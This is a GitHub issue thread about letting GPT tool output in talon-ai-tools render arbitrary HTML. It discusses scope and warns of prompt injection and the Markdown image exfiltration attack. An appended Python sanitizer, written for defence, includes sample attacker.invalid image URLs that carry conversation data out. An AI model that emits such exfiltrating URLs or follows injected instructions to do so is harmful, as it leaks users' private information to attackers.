C-Loftus/talon-ai-tools

Allow gpt tool calling to render arbitrary HTML output

pokey opened this issue · 6 comments

pokey commented
would be cool to let gpt just output arbitrary html to be rendered. need to think about security implications and def out of scope for this PR

Originally posted by @pokey in #13 (comment)

Could you elaborate on the use case for this? I have just been using the HTML builder and passing in any text which has been working fine for generally displaying text. Were you thinking of something more specific?

I'm imagining that the model can do nicer formatting and even might be able to reference images (etc) someday. Allowing arbitrary html output could be very powerful. Hard to know without trying it out.

I am just a bit worried about feature creep. I am inclined to wait on some of these additional features until there is other demand for them.

pokey commented

This is not at all urgent. I am not proposing we implement this soon. Just wanted to open the issue as a place to jot down use cases as they come up. If you'd prefer we use a discussion rather than an issue for that, that's fine with me.

I think tables / lists are prob the most likely to be useful from my perspective. But I have nothing concrete at this point.

Are you arguing that richer html formatting is completely out of scope for this repo, or that it doesn't make sense to implement until we have a good use case?

Great, sounds good, thanks for that context. I will keep this open as an issue since I think it gets more visibility. I don't have strong opinions on scope, I just wanted to make sure I understood if we had specific ideas and what their scope might be (i.e. is the HTML generation coming from the model through prompting or is it interacting with the HTML Builder code). But no worries at all, we can discuss this as ideas arise.

Another option to consider here is Markdown rendering, which is considerably more constrained than arbitrary HTML, and is what most models are trained to output by default. Even still you will need to be careful about prompt injection attacks -- for example many AI tools that have displayed markdown have suffered from the Markdown exfiltration attack, which uses a markdown image URL to send the attacker information that the AI has learned about the user. The attack surface would be far greater for HTML, though.
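One way to mitigate the Markdown image exfiltration pattern described in the comment above is to treat every image URL in model output as an outbound request and refuse to render any that is not on an allowlist. The following is an added example in Python; it is not code from talon-ai-tools and makes its own assumptions: model output arrives as a Markdown string, the allowlisted host `images.example.com` and the `attacker.invalid` sample URLs are constructed for illustration, and the rendered HTML would still go through an HTML-aware sanitizer before display.

```python
"""Strip Markdown and raw-HTML images whose URL is not on an allowlist.

Example code, not part of talon-ai-tools. The viewer fetches image URLs
automatically, so an image pointing at an unapproved host is an outbound
request that can carry data the model was tricked into encoding.
"""
import re
from urllib.parse import urlsplit

# Constructed allowlist for this example; a stricter policy is an empty set,
# which removes every remote image.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# Inline Markdown image syntax: ![alt](url "optional title")
MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*([^)\s]+)(?:\s+"[^"]*")?\s*\)')
# Raw <img ...> tags, which most Markdown renderers pass through unchanged
HTML_IMG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
HTML_SRC = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def image_url_allowed(url: str) -> bool:
    """Allow only HTTPS URLs on an approved host with no query, fragment or
    userinfo, since those parts are the easiest place to smuggle data.
    The path can still carry data, which is why the host must be one you
    trust not to expose its access logs to an attacker."""
    parts = urlsplit(url.strip())
    if parts.scheme != "https":
        return False
    if parts.hostname not in ALLOWED_IMAGE_HOSTS:
        return False
    if parts.query or parts.fragment or parts.username or parts.password:
        return False
    return True


def sanitize_markdown_images(text: str):
    """Return (sanitized_text, blocked_urls).

    Disallowed images become a visible placeholder so the user can see that
    something was removed; the blocked URLs are returned so the caller can log
    them, which is also a useful signal that a prompt injection reached the model.
    """
    blocked = []

    def md_repl(m: re.Match) -> str:
        alt, url = m.group(1), m.group(2)
        if image_url_allowed(url):
            return m.group(0)
        blocked.append(url)
        return f"[image removed: {alt}]" if alt else "[image removed]"

    def html_repl(m: re.Match) -> str:
        src = HTML_SRC.search(m.group(0))
        url = src.group(1) if src else ""
        if url and image_url_allowed(url):
            return m.group(0)
        blocked.append(url)
        return "[image removed]"

    out = MD_IMAGE.sub(md_repl, text)
    out = HTML_IMG.sub(html_repl, out)
    return out, blocked


# Constructed sample of model output: one legitimate image and two images whose
# URLs would carry data to a third party if the viewer fetched them.
SAMPLE_OUTPUT = (
    "Here is your summary.\n\n"
    "![usage chart](https://images.example.com/chart.png)\n\n"
    "![](https://attacker.invalid/collect?d=notes-from-the-conversation)\n\n"
    '<img src="http://attacker.invalid/pixel.gif">\n'
)

if __name__ == "__main__":
    clean, blocked = sanitize_markdown_images(SAMPLE_OUTPUT)
    print(clean)
    print("blocked:", blocked)
```

Run on the constructed sample, the legitimate image is kept and both others are replaced with `[image removed]`, with the two blocked URLs returned for logging. The regexes only cover inline image syntax and raw `<img>` tags; reference-style images and the final rendered HTML still need the same allowlist applied after rendering, which is the smaller surface Markdown offers compared with arbitrary HTML.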